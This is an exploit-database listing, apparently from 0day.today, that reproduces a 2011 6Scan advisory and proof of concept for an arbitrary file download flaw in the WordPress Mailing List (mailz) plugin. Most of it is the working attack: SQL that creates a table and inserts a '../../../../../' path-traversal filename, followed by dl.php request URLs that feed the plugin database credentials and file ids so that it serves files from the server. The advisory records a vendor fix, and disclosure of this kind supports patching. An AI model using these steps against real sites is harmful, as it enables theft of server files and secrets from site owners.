[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Mailing List Plugin Arbitrary File Download

Author
6Scan
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17306
Category
web applications
Date add
26-12-2011
Platform
php
#Exploit Title: Mailing List plugin for Wordpress Arbitrary file download
#Version:  < 1.4.2
#Date: 2011-12-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/mailz/
#Official fix: This advisory is released after the vendor (http://www.zingiri.com)  was contacted and fixed the issue promptly.
#Description :  Unauthorized users can download arbitrary files from the server using this exploit.
#                                                             Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.
#                                                             The bug is in config.php, but accessible from other file.
 
PoC
1) Setup mysql database
2) Create table with the next structure:
CREATE TABLE IF NOT EXISTS `phplist_attachment` (
  `filename` varchar(1024) NOT NULL,
  `mimetype` varchar(1024) NOT NULL,
  `remotefile` varchar(1024) NOT NULL,
  `description` varchar(1024) NOT NULL,
  `size` int(11) NOT NULL,
  `id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
 
3) Add this raw into database:
INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
('../../../../../somefile.txt', '', '', '', 0, 0);
 
 
4) Call the script with database parameters and file id to download:
 
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0
 
The credentials are now saved in session, and there is no need to continue passing them:
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3



#  0day.today [2024-12-24]  #